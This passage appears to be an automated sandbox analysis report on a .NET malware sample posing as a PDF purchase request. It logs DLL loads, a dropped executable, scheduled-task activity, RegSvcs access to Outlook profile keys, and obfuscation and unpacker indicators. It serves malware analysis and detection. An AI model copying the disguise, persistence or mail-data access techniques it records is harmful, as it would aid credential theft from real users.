                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeSection loaded: iconcodecservice.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.8230000.4.raw.unpack, L2.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.a140000.5.raw.unpack, TAL8UFyQqTbGLmT9Io.cs.Net Code: xqy7MUoUWQ System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4b62270.0.raw.unpack, L2.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4d92be0.3.raw.unpack, TAL8UFyQqTbGLmT9Io.cs.Net Code: xqy7MUoUWQ System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e11a00.1.raw.unpack, TAL8UFyQqTbGLmT9Io.cs.Net Code: xqy7MUoUWQ System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeCode function: 0_2_03139F8C push edi; retf 0_2_03139F8D
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeCode function: 0_2_09E8F718 push edx; ret 0_2_09E8F71B
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeCode function: 0_2_0A79D840 push eax; iretd 0_2_0A79D841
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeCode function: 0_2_0A79CF00 pushfd ; retf 0_2_0A79CF01
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeCode function: 0_2_0A79E620 push C000005Eh; ret 0_2_0A79E639
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00F97AB5 pushfd ; iretd 10_2_00F97A8A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00F97A85 pushfd ; iretd 10_2_00F97A8A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00F90C6D push edi; retf 10_2_00F90C7A
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeCode function: 11_2_00BC9F8C push edi; retf 11_2_00BC9F8D
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeCode function: 11_2_07B8CEE0 pushfd ; retf 11_2_07B8CEE1
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeCode function: 11_2_07B8D820 push eax; iretd 11_2_07B8D821
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_02B77A85 pushfd ; iretd 15_2_02B77A8A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_02B77AC5 pushfd ; iretd 15_2_02B77A8A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_02B70C6D push edi; retf 15_2_02B70C7A
                    Source: REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeStatic PE information: section name: .text entropy: 7.712111849426876
                    Source: vmPeKTe.exe.0.drStatic PE information: section name: .text entropy: 7.712111849426876
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.a140000.5.raw.unpack, WY5FOp4WkFIIAQvMC2.csHigh entropy of concatenated method names: 'DRFsYtKBGd', 'Iivsde1W6i', 'b6YsPsphoe', 'RZ9sXSW0QV', 'p74s95HPex', 'rnwsqoYTRD', 'PbSsZpCpSn', 'QTusK4aNfF', 'SDVsVpS55E', 'uWwsmoIuEh'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.a140000.5.raw.unpack, de0thciNrhsqCDPdH7.csHigh entropy of concatenated method names: 'fSn0INZecy', 'ABx0cYIyai', 'Q9U0YXsuLq', 'CRT0dXOIXH', 'XIs0XFbTZN', 'vET09Vpb9Z', 'xAI0ZfEDX2', 'QyC0KP4aBm', 'uvx0m2IRyb', 'e200hqOALR'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.a140000.5.raw.unpack, jP6hQDYWNYGmfnrDdp.csHigh entropy of concatenated method names: 'mnYEwTM2Kj', 'fE0EWludhs', 'PJDE6bWK5a', 'gxNEgPE43j', 'hJeEyo3Kop', 'CWe6ayOi5M', 'AaS6LfHaSH', 'YfD6eGntXP', 'iAt6xrT2Ht', 'iH864jpBYN'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.a140000.5.raw.unpack, rRGkiiO0AW4v6qmLwf.csHigh entropy of concatenated method names: 'gpPF3jRXyK', 'xiqF6nUFFA', 'AZiFEuZ9dZ', 'IXTFg5ya3m', 'TGxFsBVkQQ', 'J5BFypE2yN', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.a140000.5.raw.unpack, Tvu1OdVgGQNNEEUex0.csHigh entropy of concatenated method names: 'yRfg8jUUFP', 'CdIgJDfpT7', 'BwvgMPJafh', 'JtLg2pmeQq', 'hUMgv8CLoR', 'JbCgDI0L02', 'RPCgtEx1w6', 'sItgImfa5Q', 'tL8gcbd9Rk', 'IQJgoQay6o'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.a140000.5.raw.unpack, iDd0mAcfQWtuBBMRi6.csHigh entropy of concatenated method names: 'zhA32vy1Io', 'QSR3DtqW1H', 'hKU3IOBHXM', 'njp3cy02fN', 'RAh3A3dX2t', 'cGI3fyRPRt', 'QaR3UZ5hYr', 'Ojw3r1UZoi', 'YNo3s8ouGS', 'D0H3FWee0U'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.a140000.5.raw.unpack, gMtVMrotEpDGrlPgLr.csHigh entropy of concatenated method names: 'peI6v1wY3h', 'zKu6tYvg9c', 'QGt3PJinNV', 'BTO3XW0o1U', 'Rcm39IFuM2', 'QXg3qyPlnY', 'Eg13Zay4I1', 'ai43KQOicq', 'uvw3VTK2cQ', 'ahw3mvoXty'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.a140000.5.raw.unpack, CICuwYIYM9uBpgQHNv.csHigh entropy of concatenated method names: 'NLdWplfSBY', 'XU9WQilnyK', 'IxxWjvlmqW', 'nExWCliifw', 'No9WaOIOx0', 'IqOWLtoUYv', 'mqKWe5JHR3', 'U1DWxZJ43L', 'oOAW4jqJcX', 'GJcWOBIFtt'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.a140000.5.raw.unpack, FdGZLlzEeF8Lj3S1pa.csHigh entropy of concatenated method names: 'WqjFDEkLk4', 'kADFI4vEeO', 'QRhFc5bjrE', 'FlgFY2tOgx', 'FsBFdp6kDQ', 'R3XFXJpyZ3', 'YoBF93ejDW', 'n4iFnUZLsQ', 'GO0F8MSIZX', 'tN6FJEaoCY'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.a140000.5.raw.unpack, TjEiRpjmFreNGi1GQE.csHigh entropy of concatenated method names: 'ToString', 'dTRfhGrbAC', 'PE2fdqUD8g', 'FdAfPu3seD', 'k2IfXrc5Yt', 'VgMf9lli5e', 'zx6fqnbgC5', 'DNpfZRXkLY', 'PetfK1ekmX', 'NN9fVnlu1a'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.a140000.5.raw.unpack, lit4EtWWNL89DT6iD4.csHigh entropy of concatenated method names: 'Dispose', 'f0KS4xwOq5', 'ND5GdTd3MB', 'Dv1HwnpKf2', 'vfSSOCbmOk', 'UU7Szq6DCj', 'ProcessDialogKey', 'EFeGTY5FOp', 'gkFGSIIAQv', 'zC2GGrRGki'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.a140000.5.raw.unpack, NkWkKSGTXYT0MLabEL.csHigh entropy of concatenated method names: 'z7eMX5JHN', 'wo62P05Jg', 'vGmDBirRe', 'IxFtBNJZ3', 'FZBcdNDsB', 'Gv2o2pdu3', 'yyYe0Rf5KTSDBU3Yo2', 'rQbZOSpTxMmEtnxBcf', 'mTWrLWvdu', 'TGYFqFRhj'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.a140000.5.raw.unpack, TAL8UFyQqTbGLmT9Io.csHigh entropy of concatenated method names: 'dg2bwPD70r', 'mrMbBJxi1C', 'DaabW5gb7s', 'dEbb3WUmK1', 'PGdb63wPWi', 'EMKbEjWIrZ', 'RfTbgcXM7Q', 'wIrbytXRps', 'zVsbNuUxKr', 'duwbHdtVWC'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.a140000.5.raw.unpack, WHhp89Sb61Xw7XCjlZL.csHigh entropy of concatenated method names: 'MklkOsRHp2', 'PuMkzjnsoS', 'LDe5Tkjna6', 'dkleXHt2KcK8WiI2UxB', 'KrYaTHtXmlnVmQLUv5i', 'FS2XsDtPfopDFdEvV9Y', 'SIF7AqtF0w0UXdJhjOt'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.a140000.5.raw.unpack, xRG7wVLQfFV1CGtGc8.csHigh entropy of concatenated method names: 'lD6UxSL2U7', 'MdiUO8T72S', 'F65rTsRtQj', 'WgurSfgs9I', 'YLQUhy4rqu', 'FTdURrglbq', 'lSgUiY5H4y', 'adBUpbavjl', 'LbUUQoBnJy', 'CRKUjJr5vo'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.a140000.5.raw.unpack, nwj2Pb7n4CIxW3AyM7.csHigh entropy of concatenated method names: 'tgDSgICuwY', 'FM9SyuBpgQ', 'ofQSHWtuBB', 'zRiSl6WMtV', 'mPgSALrgP6', 'OQDSfWNYGm', 'cNgaPs7wwKQi8VsbTd', 'JMV4YVBHpemyg3npZF', 'QraSSthaV5', 'tfWSb1pYhA'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.a140000.5.raw.unpack, jriDlbpWiYb4rMfku3.csHigh entropy of concatenated method names: 'h4GAmkscMP', 'YqDARE3gux', 'FtOApk59P9', 'wSTAQQNjM0', 'okjAd1Lcc3', 'u5JAPjHrto', 'LkTAXmrY6A', 'eL6A9t1gxQ', 'Fy3Aq2feL8', 'tGAAZJAJKh'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.a140000.5.raw.unpack, LBN5TXZhKBybyrCkrN.csHigh entropy of concatenated method names: 'SMNgBOhmcv', 'ohgg3x6hUu', 'roxgEnopak', 'mGXEOFQZIa', 'qJgEz3bxXh', 'aeVgT3gHYE', 'Pn6gST1YiA', 'sqmgGKB7d7', 'omSgbJ7Wab', 'es0g7CO0NJ'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.a140000.5.raw.unpack, aAXtqtSTtvwGLspYoBZ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ybsFhUc9Cb', 'UriFR8w6xe', 'F6dFiQc45Y', 'rGTFpBnJmO', 'kV9FQNK5dp', 'xaRFjuOCF6', 'cdTFCeMH0C'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.a140000.5.raw.unpack, mWTkQFSSRoiFTDy9vY7.csHigh entropy of concatenated method names: 'xwrFOCRMvF', 'W8KFzJd2PU', 'vO6kT0e2Vc', 'tdDkSDMvlE', 'Y5okGXQ6n4', 'Btgkb8fZ43', 'fEMk7cnKmU', 'g5ikwFmHe2', 'FcTkBTXdiS', 'dEakWjYUMV'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.a140000.5.raw.unpack, s09vsjS7KUlEfIGgpxu.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Siw5suddu8', 'MYo5FPHROc', 'lER5k6w9eL', 'lXK55YZjZk', 'HiV5uRqKhY', 'RS751AneUg', 'uGV5nIX8On'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.a140000.5.raw.unpack, YqbkFNeqIB0KxwOq51.csHigh entropy of concatenated method names: 'JL4sAIWZhp', 'jdysUamwWJ', 'cnLssupJce', 'OK0skDUXEF', 'irgsuH28F0', 'eQbsn84gW6', 'Dispose', 'Uy9rBpMRMH', 'csXrWicEiX', 'eb6r3QYXX2'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4d92be0.3.raw.unpack, WY5FOp4WkFIIAQvMC2.csHigh entropy of concatenated method names: 'DRFsYtKBGd', 'Iivsde1W6i', 'b6YsPsphoe', 'RZ9sXSW0QV', 'p74s95HPex', 'rnwsqoYTRD', 'PbSsZpCpSn', 'QTusK4aNfF', 'SDVsVpS55E', 'uWwsmoIuEh'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4d92be0.3.raw.unpack, de0thciNrhsqCDPdH7.csHigh entropy of concatenated method names: 'fSn0INZecy', 'ABx0cYIyai', 'Q9U0YXsuLq', 'CRT0dXOIXH', 'XIs0XFbTZN', 'vET09Vpb9Z', 'xAI0ZfEDX2', 'QyC0KP4aBm', 'uvx0m2IRyb', 'e200hqOALR'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4d92be0.3.raw.unpack, jP6hQDYWNYGmfnrDdp.csHigh entropy of concatenated method names: 'mnYEwTM2Kj', 'fE0EWludhs', 'PJDE6bWK5a', 'gxNEgPE43j', 'hJeEyo3Kop', 'CWe6ayOi5M', 'AaS6LfHaSH', 'YfD6eGntXP', 'iAt6xrT2Ht', 'iH864jpBYN'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4d92be0.3.raw.unpack, rRGkiiO0AW4v6qmLwf.csHigh entropy of concatenated method names: 'gpPF3jRXyK', 'xiqF6nUFFA', 'AZiFEuZ9dZ', 'IXTFg5ya3m', 'TGxFsBVkQQ', 'J5BFypE2yN', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4d92be0.3.raw.unpack, Tvu1OdVgGQNNEEUex0.csHigh entropy of concatenated method names: 'yRfg8jUUFP', 'CdIgJDfpT7', 'BwvgMPJafh', 'JtLg2pmeQq', 'hUMgv8CLoR', 'JbCgDI0L02', 'RPCgtEx1w6', 'sItgImfa5Q', 'tL8gcbd9Rk', 'IQJgoQay6o'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4d92be0.3.raw.unpack, iDd0mAcfQWtuBBMRi6.csHigh entropy of concatenated method names: 'zhA32vy1Io', 'QSR3DtqW1H', 'hKU3IOBHXM', 'njp3cy02fN', 'RAh3A3dX2t', 'cGI3fyRPRt', 'QaR3UZ5hYr', 'Ojw3r1UZoi', 'YNo3s8ouGS', 'D0H3FWee0U'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4d92be0.3.raw.unpack, gMtVMrotEpDGrlPgLr.csHigh entropy of concatenated method names: 'peI6v1wY3h', 'zKu6tYvg9c', 'QGt3PJinNV', 'BTO3XW0o1U', 'Rcm39IFuM2', 'QXg3qyPlnY', 'Eg13Zay4I1', 'ai43KQOicq', 'uvw3VTK2cQ', 'ahw3mvoXty'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4d92be0.3.raw.unpack, CICuwYIYM9uBpgQHNv.csHigh entropy of concatenated method names: 'NLdWplfSBY', 'XU9WQilnyK', 'IxxWjvlmqW', 'nExWCliifw', 'No9WaOIOx0', 'IqOWLtoUYv', 'mqKWe5JHR3', 'U1DWxZJ43L', 'oOAW4jqJcX', 'GJcWOBIFtt'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4d92be0.3.raw.unpack, FdGZLlzEeF8Lj3S1pa.csHigh entropy of concatenated method names: 'WqjFDEkLk4', 'kADFI4vEeO', 'QRhFc5bjrE', 'FlgFY2tOgx', 'FsBFdp6kDQ', 'R3XFXJpyZ3', 'YoBF93ejDW', 'n4iFnUZLsQ', 'GO0F8MSIZX', 'tN6FJEaoCY'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4d92be0.3.raw.unpack, TjEiRpjmFreNGi1GQE.csHigh entropy of concatenated method names: 'ToString', 'dTRfhGrbAC', 'PE2fdqUD8g', 'FdAfPu3seD', 'k2IfXrc5Yt', 'VgMf9lli5e', 'zx6fqnbgC5', 'DNpfZRXkLY', 'PetfK1ekmX', 'NN9fVnlu1a'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4d92be0.3.raw.unpack, lit4EtWWNL89DT6iD4.csHigh entropy of concatenated method names: 'Dispose', 'f0KS4xwOq5', 'ND5GdTd3MB', 'Dv1HwnpKf2', 'vfSSOCbmOk', 'UU7Szq6DCj', 'ProcessDialogKey', 'EFeGTY5FOp', 'gkFGSIIAQv', 'zC2GGrRGki'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4d92be0.3.raw.unpack, NkWkKSGTXYT0MLabEL.csHigh entropy of concatenated method names: 'z7eMX5JHN', 'wo62P05Jg', 'vGmDBirRe', 'IxFtBNJZ3', 'FZBcdNDsB', 'Gv2o2pdu3', 'yyYe0Rf5KTSDBU3Yo2', 'rQbZOSpTxMmEtnxBcf', 'mTWrLWvdu', 'TGYFqFRhj'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4d92be0.3.raw.unpack, TAL8UFyQqTbGLmT9Io.csHigh entropy of concatenated method names: 'dg2bwPD70r', 'mrMbBJxi1C', 'DaabW5gb7s', 'dEbb3WUmK1', 'PGdb63wPWi', 'EMKbEjWIrZ', 'RfTbgcXM7Q', 'wIrbytXRps', 'zVsbNuUxKr', 'duwbHdtVWC'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4d92be0.3.raw.unpack, WHhp89Sb61Xw7XCjlZL.csHigh entropy of concatenated method names: 'MklkOsRHp2', 'PuMkzjnsoS', 'LDe5Tkjna6', 'dkleXHt2KcK8WiI2UxB', 'KrYaTHtXmlnVmQLUv5i', 'FS2XsDtPfopDFdEvV9Y', 'SIF7AqtF0w0UXdJhjOt'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4d92be0.3.raw.unpack, xRG7wVLQfFV1CGtGc8.csHigh entropy of concatenated method names: 'lD6UxSL2U7', 'MdiUO8T72S', 'F65rTsRtQj', 'WgurSfgs9I', 'YLQUhy4rqu', 'FTdURrglbq', 'lSgUiY5H4y', 'adBUpbavjl', 'LbUUQoBnJy', 'CRKUjJr5vo'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4d92be0.3.raw.unpack, nwj2Pb7n4CIxW3AyM7.csHigh entropy of concatenated method names: 'tgDSgICuwY', 'FM9SyuBpgQ', 'ofQSHWtuBB', 'zRiSl6WMtV', 'mPgSALrgP6', 'OQDSfWNYGm', 'cNgaPs7wwKQi8VsbTd', 'JMV4YVBHpemyg3npZF', 'QraSSthaV5', 'tfWSb1pYhA'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4d92be0.3.raw.unpack, jriDlbpWiYb4rMfku3.csHigh entropy of concatenated method names: 'h4GAmkscMP', 'YqDARE3gux', 'FtOApk59P9', 'wSTAQQNjM0', 'okjAd1Lcc3', 'u5JAPjHrto', 'LkTAXmrY6A', 'eL6A9t1gxQ', 'Fy3Aq2feL8', 'tGAAZJAJKh'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4d92be0.3.raw.unpack, LBN5TXZhKBybyrCkrN.csHigh entropy of concatenated method names: 'SMNgBOhmcv', 'ohgg3x6hUu', 'roxgEnopak', 'mGXEOFQZIa', 'qJgEz3bxXh', 'aeVgT3gHYE', 'Pn6gST1YiA', 'sqmgGKB7d7', 'omSgbJ7Wab', 'es0g7CO0NJ'
